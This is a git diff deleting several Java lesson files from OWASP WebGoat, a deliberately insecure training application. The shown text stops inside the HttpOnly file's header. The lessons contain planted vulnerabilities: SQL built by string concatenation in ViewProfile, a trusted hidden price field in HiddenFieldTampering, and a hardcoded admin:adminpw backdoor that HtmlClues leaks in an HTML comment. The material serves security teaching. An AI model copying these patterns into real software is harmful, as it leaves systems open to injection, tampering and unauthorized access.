@@ -1,212 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.PreparedStatement; -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import org.owasp.webgoat.session.Employee; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.ValidationException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class UpdateProfile extends DefaultLessonAction -{ - - private LessonAction chainedAction; - - public UpdateProfile(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException, ValidationException - { - if (isAuthenticated(s)) - { - int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - - int subjectId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID, 0); - - String firstName = s.getParser().getStringParameter(GoatHillsFinancial.FIRST_NAME); - String lastName = s.getParser().getStringParameter(GoatHillsFinancial.LAST_NAME); - String ssn = s.getParser().getStringParameter(GoatHillsFinancial.SSN); - String title = s.getParser().getStringParameter(GoatHillsFinancial.TITLE); - String phone = s.getParser().getStringParameter(GoatHillsFinancial.PHONE_NUMBER); - String address1 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS1); - String address2 = s.getParser().getStringParameter(GoatHillsFinancial.ADDRESS2); - int manager = s.getParser().getIntParameter(GoatHillsFinancial.MANAGER); - String startDate = s.getParser().getStringParameter(GoatHillsFinancial.START_DATE); - int salary = s.getParser().getIntParameter(GoatHillsFinancial.SALARY); - String ccn = s.getParser().getStringParameter(GoatHillsFinancial.CCN); - int ccnLimit = s.getParser().getIntParameter(GoatHillsFinancial.CCN_LIMIT); - String disciplinaryActionDate = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_DATE); - String disciplinaryActionNotes = s.getParser().getStringParameter(GoatHillsFinancial.DISCIPLINARY_NOTES); - String personalDescription = s.getParser().getStringParameter(GoatHillsFinancial.DESCRIPTION); - 
- Employee employee = new Employee(subjectId, firstName, lastName, ssn, title, phone, address1, address2, - manager, startDate, salary, ccn, ccnLimit, disciplinaryActionDate, disciplinaryActionNotes, - personalDescription); - - if (subjectId > 0) - { - this.changeEmployeeProfile(s, userId, subjectId, employee); - setRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID, Integer - .toString(subjectId)); - } - else - this.createEmployeeProfile(s, userId, employee); - - try - { - chainedAction.handleRequest(s); - } catch (UnauthenticatedException ue1) - { - // System.out.println("Internal server error"); - ue1.printStackTrace(); - } catch (UnauthorizedException ue2) - { - // System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.VIEWPROFILE_ACTION; - } - - public void changeEmployeeProfile(WebSession s, int userId, int subjectId, Employee employee) - throws UnauthorizedException - { - try - { - // Note: The password field is ONLY set by ChangePassword - String query = "UPDATE employee SET first_name = ?, last_name = ?, ssn = ?, title = ?, phone = ?, address1 = ?, address2 = ?," - + " manager = ?, start_date = ?, ccn = ?, ccn_limit = ?," - + " personal_description = ? 
WHERE userid = ?;"; - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - - ps.setString(1, employee.getFirstName()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getPersonalDescription()); - ps.setInt(13, subjectId); - ps.execute(); - } catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } - - } catch (Exception e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } - - private int getNextUID(WebSession s) - { - int uid = -1; - try - { - Statement statement = WebSession.getConnection(s).createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery("select max(userid) as uid from employee"); - results.first(); - uid = results.getInt("uid"); - } catch (SQLException sqle) - { - sqle.printStackTrace(); - s.setMessage("Error updating employee profile"); - } - return uid + 1; - } - - public void createEmployeeProfile(WebSession s, int userId, Employee employee) throws UnauthorizedException - { - try - { - int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; - - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - - ps.setString(1, employee.getFirstName().toLowerCase()); - ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, 
employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); - - ps.execute(); - } catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java b/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java deleted file mode 100644 index e9d764153..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/GoatHillsFinancial/ViewProfile.java +++ /dev/null 
@@ -1,124 +0,0 @@ - -package org.owasp.webgoat.lessons.GoatHillsFinancial; - -import java.sql.ResultSet; -import java.sql.SQLException; -import java.sql.Statement; -import org.owasp.webgoat.session.Employee; -import org.owasp.webgoat.session.ParameterNotFoundException; -import org.owasp.webgoat.session.UnauthenticatedException; -import org.owasp.webgoat.session.UnauthorizedException; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - */ -public class ViewProfile extends DefaultLessonAction -{ - - public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, - UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) - { - int userId = getIntSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.USER_ID); - int employeeId = -1; - try - { - // User selected employee - employeeId = s.getParser().getIntParameter(GoatHillsFinancial.EMPLOYEE_ID); - } catch (ParameterNotFoundException e) - { - // May be an internally selected employee - employeeId = getIntRequestAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ID); - } - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." + GoatHillsFinancial.EMPLOYEE_ATTRIBUTE_KEY, employee); - } - else - throw new UnauthenticatedException(); - - } - - public String getNextPage(WebSession s) - { - return GoatHillsFinancial.VIEWPROFILE_ACTION; - } - - protected Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) - { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), - answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results - .getString("title"), answer_results.getString("phone"), answer_results - .getString("address1"), answer_results.getString("address2"), answer_results - .getInt("manager"), answer_results.getString("start_date"), answer_results - .getInt("salary"), answer_results.getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results - .getString("disciplined_notes"), answer_results.getString("personal_description")); - /* - * System.out.println("Retrieved employee from db: " + profile.getFirstName() + - * " " + profile.getLastName() + " (" + profile.getId() + ")"); - */} - } catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); - } - - return profile; - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java b/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java deleted file mode 100644 index 9a8bc1823..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/HiddenFieldTampering.java +++ /dev/null 
@@ -1,230 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.text.DecimalFormat; -import java.util.ArrayList; -import java.util.List; -import java.util.regex.Pattern; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.B; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.Center; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TH; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Jeff Williams Aspect Security - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 - */ -public class HiddenFieldTampering extends LessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - private final static String PRICE = "Price"; - - private final static String PRICE_TV = "2999.99"; - - private final static String PRICE_TV_HACKED = "9.99"; - - String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any - // interesting exploit! - Pattern pattern1 = Pattern.compile(regex); - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; - - /** - * Constructor for the HiddenFieldScreen object - */ - public HiddenFieldTampering() - { - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - ec.addElement(new StringElement(script)); - float quantity; - float total; - String price = PRICE_TV; - DecimalFormat money = new DecimalFormat("$0.00"); - try - { - price = s.getParser().getRawParameter(PRICE, PRICE_TV); - quantity = s.getParser().getFloatParameter("QTY", 1.0f); - total = quantity * Float.parseFloat(price); - } catch (Exception e) - { - s.setMessage(getLabelManager().get("Invaild data") + this.getClass().getName()); - price = PRICE_TV; - quantity = 1.0f; - total = quantity * Float.parseFloat(PRICE_TV); - - } - - if (price.equals(PRICE_TV)) - { - ec.addElement(new Center().addElement(new H1().addElement(getLabelManager().get("ShoppingCart")))); - ec.addElement(new BR()); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center"); - - 
if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH().addElement(getLabelManager().get("ShoppingCartItems")).setWidth("80%")); - tr.addElement(new TH().addElement(getLabelManager().get("Price")).setWidth("10%")); - tr.addElement(new TH().addElement(getLabelManager().get("Quantity")).setWidth("3%")); - tr.addElement(new TH().addElement(getLabelManager().get("Total")).setWidth("7%")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)")); - tr.addElement(new TD().addElement(PRICE_TV).setAlign("right")); - tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1).setSize(6)).setAlign("right")); - tr.addElement(new TD().addElement(money.format(total))); - t.addElement(tr); - - ec.addElement(t); - - t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - ec.addElement(new BR()); - tr = new TR(); - tr.addElement(new TD().addElement(getLabelManager().get("TotalChargedCreditCard")+":")); - tr.addElement(new TD().addElement(money.format(total))); - tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("UpdateCart")))); - tr.addElement(new TD().addElement(ECSFactory.makeButton(getLabelManager().get("Purchase"), "validate()"))); - t.addElement(tr); - - ec.addElement(t); - - Input input = new Input(Input.HIDDEN, PRICE, PRICE_TV); - ec.addElement(input); - ec.addElement(new BR()); - - } - else - { - if (!price.toString().equals(PRICE_TV)) - { - makeSuccess(s); - } - - ec.addElement(new P().addElement(getLabelManager().get("TotalPriceIs")+":")); - ec.addElement(new B("$" + total)); - ec.addElement(new BR()); - ec.addElement(new P().addElement(getLabelManager().get("ThisAmountCharged"))); - } - - return (ec); - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! 
- */ - protected Category getDefaultCategory() - { - return Category.PARAMETER_TAMPERING; - } - - /** - * Gets the hints attribute of the HiddenFieldScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - - hints.add(getLabelManager().get("HiddenFieldTamperingHint1")); - hints.add(getLabelManager().get("HiddenFieldTamperingHint2")); - hints.add(getLabelManager().get("HiddenFieldTamperingHint3")+ PRICE_TV +getLabelManager().get("HiddenFieldTamperingHint32") + PRICE_TV_HACKED ); - - return hints; - } - - - - private final static Integer DEFAULT_RANKING = new Integer(50); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the HiddenFieldScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Exploit Hidden Fields"); - } - - public Element getCredits() - { - return super.getCustomCredits("", ASPECT_LOGO); - } -} diff --git a/src/main/java/org/owasp/webgoat/lessons/HowToWork.java b/src/main/java/org/owasp/webgoat/lessons/HowToWork.java deleted file mode 100644 index 07a32acaf..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/HowToWork.java +++ /dev/null 
@@ -1,89 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Reto Lippuner, Marcel Wirth - * @created April 4, 2008 - */ -public class HowToWork extends LessonAdapter -{ - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - makeSuccess(s); - ElementContainer ec = new ElementContainer(); - ec.addElement(new StringElement("Welcome to WebGoat !!")); - return (ec); - } - - /** - * Gets the category attribute of the HowToWork object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.INTRODUCTION; - } - - private final static Integer DEFAULT_RANKING = new Integer(10); - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - /** - * Gets the title attribute of the DirectoryScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("How to work with WebGoat"); - } - - public Element getCredits() - { - return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement("")); - } - -} diff --git a/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java b/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java deleted file mode 100644 index d04be31f0..000000000 --- a/src/main/java/org/owasp/webgoat/lessons/HtmlClues.java +++ /dev/null 
@@ -1,240 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.B; -import org.apache.ecs.html.Comment; -import org.apache.ecs.html.H1; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.P; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TH; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 - */ -public class HtmlClues extends LessonAdapter -{ - public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com") - .addElement( - new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0) - .setVspace(0)); - - /** - * Description of the Field - */ - protected final static String PASSWORD = "Password"; - - /** - * Description of the Field - */ - protected final static String USERNAME = "Username"; - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - private boolean backdoor(WebSession s) - { - String username = s.getParser().getRawParameter(USERNAME, ""); - String password = s.getParser().getRawParameter(PASSWORD, ""); - - // - return (username.equals("admin") && password.equals("adminpw")); - // - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try - { - // - ec.addElement(new Comment("FIXME admin:adminpw")); - // - ec.addElement(new Comment("Use Admin to regenerate database")); - - if (backdoor(s)) - { - makeSuccess(s); - - s.setMessage(getLabelManager().get("HtmlCluesBINGO")); - ec.addElement(makeUser(s, "admin", "CREDENTIALS")); - } - else - { - ec.addElement(makeLogin(s)); - } - } catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - } - - return (ec); - } - - /** - * Description of the Method - * - * @param s - * Description of the Parameter - * @param user - * Description of the Parameter - * @param method - * Description of the Parameter - * @return Description of the Return Value - * @exception Exception - * Description of the Exception - */ - protected 
Element makeUser(WebSession s, String user, String method) throws Exception - { - ElementContainer ec = new ElementContainer(); - ec.addElement(new P().addElement(getLabelManager().get("WelcomeUser")+ user)); - ec.addElement(new P().addElement(getLabelManager().get("YouHaveBeenAuthenticatedWith") + method)); - - return (ec); - } - - protected Element makeLogin(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - ec.addElement(new H1().addElement("Sign In ")); - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); - - if (s.isColor()) - { - t.setBorder(1); - } - - TR tr = new TR(); - tr.addElement(new TH() - .addElement(getLabelManager().get("WeakAuthenticationCookiePleaseSignIn")) - .setColSpan(2).setAlign("left")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement("*"+getLabelManager().get("RequiredFields")).setWidth("30%")); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().addElement(" ").setColSpan(2)); - t.addElement(tr); - - TR row1 = new TR(); - TR row2 = new TR(); - row1.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("UserName")+": ")))); - row2.addElement(new TD(new B(new StringElement("*"+getLabelManager().get("Password")+": ")))); - - Input input1 = new Input(Input.TEXT, USERNAME, ""); - Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); - row1.addElement(new TD(input1)); - row2.addElement(new TD(input2)); - t.addElement(row1); - t.addElement(row2); - - Element b = ECSFactory.makeButton(getLabelManager().get("Login")); - t.addElement(new TR(new TD(b))); - ec.addElement(t); - - return (ec); - } - - /** - * Gets the hints attribute of the CluesScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add(getLabelManager().get("HtmlCluesHint1")); - hints.add(getLabelManager().get("HtmlCluesHint2")); - 
hints.add(getLabelManager().get("HtmlCluesHint3"));
-
- return hints;
- }
-
-
-
- private final static Integer DEFAULT_RANKING = new Integer(30);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the category attribute of the FailOpenAuthentication object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.CODE_QUALITY;
- }
-
- /**
- * Gets the title attribute of the CluesScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Discover Clues in the HTML");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java b/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java
deleted file mode 100644
index c5be5587d..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HttpBasics.java
+++ /dev/null
@@ -1,123 +0,0 @@ -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.List; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.BR; -import org.apache.ecs.html.Input; -import org.owasp.webgoat.session.ECSFactory; -import org.owasp.webgoat.session.WebSession; - -/** - * ************************************************************************************************* - * - * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. - * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository - * for free software projects. 
- * - * For details, please see http://webgoat.github.io - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 - */ -public class HttpBasics extends LessonAdapter { - - private final static String PERSON = "person"; - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) { - ElementContainer ec = new ElementContainer(); - - StringBuffer person = null; - try { - ec.addElement(new BR()); - ec.addElement(new StringElement(getLabelManager().get("EnterYourName") + ": ")); - - person = new StringBuffer(s.getParser().getStringParameter(PERSON, "")); - person.reverse(); - - Input input = new Input(Input.TEXT, PERSON, person.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton(getLabelManager().get("Go!")); - ec.addElement(b); - } catch (Exception e) { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); - } - - if (!person.toString().equals("") && getLessonTracker(s).getNumVisits() > 3) { - makeSuccess(s); - } - - return (ec); - } - - /** - * Gets the hints attribute of the HelloScreen object - * - * @return The hints value - */ - public List getHints(WebSession s) { - List hints = new ArrayList(); - hints.add("Type in your name and press 'go'"); - hints.add("Turn on Show Parameters or other features"); - hints.add("Try to intercept the request with OWASP ZAP"); - hints.add("Press the Show Lesson Plan button to view a lesson summary"); - hints.add("Press the Show Solution button to view a lesson solution"); - - return hints; - } - - /** - * Gets the ranking attribute of the HelloScreen object - * - * @return The ranking value - */ - private final static Integer DEFAULT_RANKING = new Integer(10); - - protected Integer getDefaultRanking() { - return DEFAULT_RANKING; - } - - protected Category getDefaultCategory() { - return Category.GENERAL; - } - - /** - * Gets the title attribute 
of the HelloScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Http Basics");
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java b/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java
deleted file mode 100644
index ff3769f14..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/HttpOnly.java
+++ /dev/null
@@ -1,522 +0,0 @@ - -package org.owasp.webgoat.lessons; - -import java.util.ArrayList; -import java.util.Date; -import java.util.List; -import java.security.MessageDigest; -import javax.servlet.http.HttpServletResponse; -import org.apache.ecs.Element; -import org.apache.ecs.ElementContainer; -import org.apache.ecs.StringElement; -import org.apache.ecs.html.A; -import org.apache.ecs.html.Form; -import org.apache.ecs.html.IMG; -import org.apache.ecs.html.Input; -import org.apache.ecs.html.TD; -import org.apache.ecs.html.TR; -import org.apache.ecs.html.Table; -import org.owasp.webgoat.session.WebSession; -import sun.misc.BASE64Encoder; - - -/*************************************************************************************************** - * - * - * This file is part of WebGoat, an Open Web Application Security Project utility. For details, - * please see http://www.owasp.org/ - * - * Copyright (c) 2002 - 20014 Bruce Mayhew - * - * This program is free software; you can redistribute it and/or modify it under the terms of the - * GNU General Public License as published by the Free Software Foundation; either version 2 of the - * License, or (at your option) any later version. - * - * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without - * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - * General Public License for more details. - * - * You should have received a copy of the GNU General Public License along with this program; if - * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA - * 02111-1307, USA. - * - * Getting Source ============== - * - * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software - * projects. 
